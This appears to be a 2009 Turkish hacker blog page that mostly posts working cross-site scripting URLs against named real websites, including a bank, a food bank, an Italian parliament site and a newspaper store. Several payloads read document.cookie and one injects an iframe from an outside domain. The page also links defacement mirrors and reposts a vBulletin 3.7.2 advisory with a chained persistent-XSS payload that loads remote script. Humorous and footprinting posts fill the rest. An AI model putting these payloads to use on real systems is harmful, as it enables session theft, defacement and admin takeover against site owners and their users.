Reklam verin!
TurkBlogın tüm Bloglarında reklam verin!

Professional Xss & Sql İnjektors Friend

Kurt Yaslanınca Balaları Taşşaklarıyla Oynarmıs ..

Menü

Ana Sayfa
Profilim

Blog Hakkında

joyb0y
Hack , Security , Günvelik , hacker , defacer , deface , hacking , msn , messenger , mail , türk hacker , sanal korsan , strategy security , .org msn hack , mail hack , web hack , warez , program , basic , programlama , lamer deşifre , vbulletin , eklenti , smf , oyun , gamez , program , crack , serial , accounts , password , nick name , accounts

Arama

Kategoriler

Arşivler

Son yazılar

Bağlantılar

Arkadaşlarım

Anket

En iyi Müzik Tarzı




Etiketler

Sayaç

  • Şu an blogda: 1
  • Önceki ayın hiti: 805
  • Dünkü hit: 40
  • Bugünkü hit: 42
  • Toplam hit: 5315

AddThis Feed Button
Add to Technorati Favorites

Diğer

YENİ BLOG

joyb0y
Ekim 24, 2009 15:05

SA ARKADASLAR TURKBLOG . COM DA Bİ OZELLİK OLMADIGI İİÇİN YENİ BLOG ACTIM KENDİME HEPİNİZİ KOMPLE ORAYA BEKLİYORUM .

 

 www.joy58.blogspot.com

 

WWW.JOY58.BLOGSPOT.COM


Yorumlar(0)
Bakış sayısı:12
Kategorisiz

http://meezanbank.com/ XSs

joyb0y
Ekim 22, 2009 11:33

http://meezanbank.com/Search.aspx?sWord=%3Ciframe+src%3dhttp%3a%2f%2fwww.vatanizm.uni.cc%3E

Yorumlar(0)
Bakış sayısı:15
XSS / CROSS-SITE SCRIPTING
xss corssing site script hack 

Kekıd

joyb0y
Ekim 20, 2009 13:09

http://abrekzone.com/deface_mirror/?id=11640

http://www.tim.strategy-security.org/defacements/?id=12

picbasic.co.uk

Yorumlar(0)
Bakış sayısı:16
Hacking & Security
hack security defaced turkish hackers 

http://www.tsviewer.com/ XSS

joyb0y
Ekim 12, 2009 12:04

http://www.tsviewer.com/index.php?page=search&action=ausgabe_user&nickname=%22%3E%3Cscript%3Ealert(%2FXSS+By+Joyb0y%2F)%3B%3C%2Fscript%3E&image.x=0&image.y=0

Yorumlar(0)
Bakış sayısı:16
XSS / CROSS-SITE SCRIPTING

Vb 3.7.2 XSS

joyb0y
Ekim 10, 2009 18:28

Advisory : XSS in admin logs
Release Date : July 06th 2008
Application : vBulletin
Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower
Platform : PHP
Vendor URL : http://www.vbulletin.com/
Authors : Jessica Hope (jessicasaulhope_at_googlemail.com),
Friends who wish to remain anonymous.

=======================================================================

Overview

Due to various failures in sanitising user input, it is possible to
construct XSS attacks that are rather damaging.

=======================================================================

Discussion

The XSS in question exists on the log viewing page of the admin control panel.

When a missing page is requested, a log is created in the admin area, however
the inputs to this log lack sanitation. The script name is taken from
basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one
can be used for introducing XSS vectors.

To highlight the severity and underline the fact that his vulnerability is
exploitable:

<html>
<body>
<img src="http://localhost/vB/upload/admincp/faq.php/0?do=<script>/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/1?do=*/a%3D'document.wri'/*"/>
<img src="http://localhost/vB/upload/admincp/faq.php/2?do=*/b%3D'te(%22<script'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/3?do=*/c%3D'src=http://'/*"/>
<!--edit to match your data -->
<img src="http://localhost/vB/upload/admincp/faq.php/4?do=*/d%3D'localhost/'/*"/>
<img src="http://localhost/vB/upload/admincp/faq.php/5?do=*/e%3D''/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/6?do=*/f%3D't.js></scrip'/*"/>
<!-- end edit -->
<img src="http://localhost/vB/upload/admincp/faq.php/7?do=*/g%3D't>%22)'/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/8?do=*/h%3Da%2Bb%2Bc%2Bd%2Be%2Bf%2Bg/*"/>
<img src="http://localhost/vB/upload/admincp/faq.php/9?do=*/eval(h)/*" />
<img src="http://localhost/vB/upload/admincp/faq.php/a0?do=*/</script>" />
</body>
</html>

You then need to send the admin to
adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1
and the XSS will render.

The limits on the XSS:
basename(PHP_SELF) is 50 characters max and no slashes
_REQUEST['do'] is limited to 20 characters, but no character restriction.

The tight character limits on the unsanitized parameters are not
mitigating the severity, as unlimited
attack space can be obtained as shown above.

As per my last exploits, all XSS in the vBulletin ACP can be used for
PHP injection instantly. This
is due to the design of the vBulletin hooks feature. As this
particular XSS is persistent and will
render in all major browsers it is particularly dangerous.

Thnks to ∂єαтн αηgєℓ for this post.

Yorumlar(0)
Bakış sayısı:14
XSS / CROSS-SITE SCRIPTING
xss hack sql anlatım 

Heykırın mektıbı :D

joyb0y
Ekim 2, 2009 17:04

 

arkadas mail atmıscok güldüm ben sizde gülün istedim xD

hackerin aşk mektubu

Sevgili Aslı....!!
Artık içimdeki sıkıştırılmış duyguları unzip etmenin zamanı geldi. Seni ram inin alamayacağı kadar çok seviyorum. Sana karşı bütün protectlerim disable durumda. Seni ilk gördüğüm anda formatlandım. Bütün cache lerim durdu, shadow ram lerle ayakta duruyorum. Bana öyle bir sistem transfer ettin ki, hiç bir komut artık beni senden ayıramaz. Senden başka herşey benim için bad command or file name. Seninle çoklu ortamlar da dahil, her ortamda mutlu olabilecegimi biliyorum. Senin megahertz in beni de ateşliyor. Bakışların beni taa derinden scan ediyor. Sana çok güveniyorum, bu mektubumu başkasina forward etmeyeceğini de çok iyi biliyorum.

Ben, seninle evlenmek istiyorum Aslı. Seninle mutlu bir ağ yapılandırması oluşturmak istiyorum. TCP/IP , netBEUI, IPX/SPX her türlü protokolde uyuşuyoruz seninle, istediğin zaman ağ yapilandirmamiza Microsoft ağlari için istemci ekleyebiliriz. Biliyorum sen benden oldukça gençsin ama tanıdığım iyi bir donanımci var, kendimi senin için upgrade ettirebilirim. Evleninceye kadar da söz; sana hiç bir şey ins&#101;rt etmeyeceğim. Evlenmeden önce DR NORTON dan randevu aldım, ikimiz de usulen bir virus taramasindan geçeceğiz. Merak etme hiç bilmediğim lisanssız software lerle ilişkim olmadi. Senin icin hardware i taş gibi diyorlar, ancak biliyorsun ki benim için software guzelliği hardware güzelliğinden önde gelir.

Aslı, seninle biz cok dvd ler seyredeceğiz. Sana evlilik yıldönümünde 24 hızlı rewritable dvd alıcam. Pembe slotlu kasamız, icinde nurtopu gibi hard disklerimiz olacak. Tatillerimizde ikimiz de birer windows gezgini olacağız. Daha sonra da ver elini internet. Sana güzel görünmek için öyle çok çalışacağım ki, üç hafta sonra karşına 21 inch plazma ekran gibi çıkacağım. Ondan sonra istersen beni duvarına bile asabilirsin. Akşamları dizlerinin üzerinde bir laptop gibi yatacağım. Asla uyku moduna geçmeyeceğim Aslı...

Biz seninle ışıkları kapatıp kucaklarımızda klavye sabahlara kadar chat edeceğiz. Ancak ilk yillarda senden biraz tasarruflu olmani isteyeceğim, onun için screen saver, standbye modu vs. anlarsın ya açık dikkatli olmanı isteyeceğim. Salonumuzun baş köşesine babamın eski 8 MHz 10 megabaytlık 8088 bilgisayarını koyacağım, malum şark köşeleri bana hep çok sıcak gelmiştir, yanına da 5,25 lik disketler. O biçim nostalji olacak. Hatta yılbaşı akşamları tetris falan oynayabiliriz. Kendimizi hep geliştireceğiz, zaman hangi ram i gerektiriyorsa uygulayacağız. Birbirimizden fikir download unu bir gurur meselesi yapmayacağız. Aramizda ayrı gayrı olmayacak, bu ağın server i benim demiyeceğiz hiçbir zaman. Herkes birbirinin sörfüne saygi duyacak.

Hadi gel, önümüzde paylaşıma açılmış bir hayat var. Seni istemek için Server ini gönderen o herifin sitesini crack ettim, anasını da hack edeceğim. Ben geleneklere sadık kalmak istiyorum şeker Aslı cığım. TV kartını kız tarafı alırmış. Seni, çeyiz sandığındaki emek emek doldurduğun cd-rom larla bekliyorum. Ben de sana xxx.com dan beş taşlı bir yüzük siparişi verdim bile. Nikahımızda da real player çalacak... Home page indekilere de çok selam, her baytını öpüyorum, CPU m daima seninle.

Not: CPU umdaki bu ateşi hiç bir fan söndüremez. Eğer connection isteğime reply etmezsen partitionumu silip boot uma virüs bulaştıracağım.


Yorumlar(2)
Bakış sayısı:75
Current Life
hacker geyik merkezi hackerin aşk 

MailTracking

joyb0y
Ekim 1, 2009 18:33

İzsürmeyi Tanımlamak
- iz sürme medotlu bir şekilde bir hedefin güvenlik profili hakkında bilgi toplamaktır.
- İz sürme 3 ön saldırı evresinden biridir.Diğerleri tarama ve enumeration dır.
- Kısacası iz sürme hedefin sistemleri (interneti,intraneti,extraneti ve wireless) hakkında
bilgi toplamaktır.

Bilgi Toplama Teknolojisi FootPrinting
- Bilgiyi ortaya çıkarmak
- Network ip aralığını bulmak
- Aktif makinaları bulmak
- Açık portları ve access point leri bulmak

Bu yazıda iz sürmede kullanılan etkili tekniklerden biri olan mailtracking e değinilecek , örneklerle kısaca açıklanacaktır.

 

DEVAMI İÇİN TIKIRT


Yorumlar(0)
Bakış sayısı:11
DökümantasyoN
mailtracking hacking security sosyal mühendislik 

http://www.centralpafoodbank.org XSS

joyb0y
Ekim 1, 2009 13:35

 http://www.centralpafoodbank.org/news/details.asp?id=198&page=233496%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3CH1%3EBY%20JOYB0Y%20FUCKING%20XADOS%3CH1%3E%3C/marquee%3E&cid=

Yorumlar(0)
Bakış sayısı:13
XSS / CROSS-SITE SCRIPTING
xss index basmak güncel acıklar 

http://si.camera.it XSS

joyb0y
Ekim 1, 2009 13:30

 http://si.camera.it:1802/camerar/aps_web_si52w$.startup?legislatura=%3Cscript%3Ealert(document.cookie);%3C/script%3E

Yorumlar(0)
Bakış sayısı:17
XSS / CROSS-SITE SCRIPTING
xss index basmak güncel acıklar 

http://store.corriere.it XSS

joyb0y
Ekim 1, 2009 13:27

 http://store.corriere.it/prodotto/9568-C004/%22%3E%3E/Joyb0y/%3Cscript%3Ealert(document.cookie)%3C/script%3E/1/Prime-pagine-corriere/Catalogo/Imprese-e-scoperte/Il-primo-trapianto-di-cuore-della-storia.html

Yorumlar(0)
Bakış sayısı:18
XSS / CROSS-SITE SCRIPTING
xss hack sql anlatım 

  Tüm yazılar: 83    Sonraki Sayfa »


© Tüm hakları blogcu için saklıdır. Destek: TürkBlog